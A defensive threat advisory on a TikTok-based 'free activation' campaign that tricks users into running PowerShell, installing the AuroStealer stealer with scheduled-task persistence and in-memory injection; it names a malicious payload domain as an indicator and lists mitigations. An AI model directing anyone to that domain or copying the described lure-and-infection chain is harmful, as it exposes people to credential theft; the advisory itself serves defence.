This threat involves a malware distribution campaign exploiting TikTok videos to trick users into installing malicious software disguised as free activations for popular software products. Attackers employ social engineering tactics to persuade victims to execute malicious PowerShell commands, which then download additional payloads including AuroStealer, a known information-stealing malware. The malware establishes persistence by creating scheduled tasks on the victim's system, ensuring continued execution after reboots. A notable technical aspect is the use of a self-compiling payload that dynamically generates code to inject shellcode directly into memory, a technique that helps evade traditional file-based detection mechanisms. The campaign leverages the ClickFix technique, which likely refers to social engineering methods that exploit user trust and interaction patterns to increase infection rates. Multiple TikTok videos have been identified as vectors, each targeting different software products, indicating a broad and adaptable campaign. Indicators of compromise include specific file hashes and a malicious domain (slmgr.win) used to host payloads. The attack chain involves initial user interaction, PowerShell script execution, payload download, persistence setup, and in-memory code injection, combining multiple MITRE ATT&CK techniques such as T1059.001 (PowerShell), T1547.001 (Scheduled Tasks), T1055 (Process Injection), and T1204.003 (User Execution). Although no CVSS score is assigned, the campaign's reliance on social engineering and user interaction limits its ease of exploitation but poses significant risks to confidentiality and integrity if successful.

For European organizations, this threat can lead to significant data breaches due to the AuroStealer payload, which is designed to exfiltrate sensitive information such as credentials and personal data. The persistence mechanisms and in-memory shellcode injection complicate detection and remediation efforts, potentially allowing prolonged unauthorized access. Organizations with employees who use TikTok or download software activations from untrusted sources are particularly vulnerable. The campaign could disrupt business operations if malware payloads interfere with system stability or network security. Additionally, compromised credentials can facilitate lateral movement within networks, increasing the risk of broader intrusions. The social engineering vector also highlights the risk of insider threats or inadvertent user compromise, which can be challenging to mitigate purely through technical controls. The medium severity reflects the balance between the need for user interaction and the potentially severe consequences of successful infections.

1. Conduct targeted user awareness training focusing on the risks of downloading software from unofficial sources and executing scripts from untrusted platforms like TikTok. 2. Implement strict PowerShell execution policies, such as enabling constrained language mode and logging all PowerShell activity for anomaly detection. 3. Monitor and audit scheduled tasks regularly to detect unauthorized persistence mechanisms. 4. Employ endpoint detection and response (EDR) solutions capable of detecting in-memory code injection and self-compiling payload behaviors. 5. Block access to known malicious domains such as slmgr.win at the network perimeter and DNS level. 6. Use application whitelisting to prevent unauthorized execution of scripts and binaries. 7. Integrate threat intelligence feeds containing the provided file hashes and indicators to enhance detection capabilities. 8. Encourage the use of official software activation channels and discourage the use of cracked or pirated software. 9. Regularly update and patch systems to reduce the attack surface, even though no specific vulnerabilities are exploited here. 10. Establish incident response procedures to quickly isolate and remediate infected systems upon detection.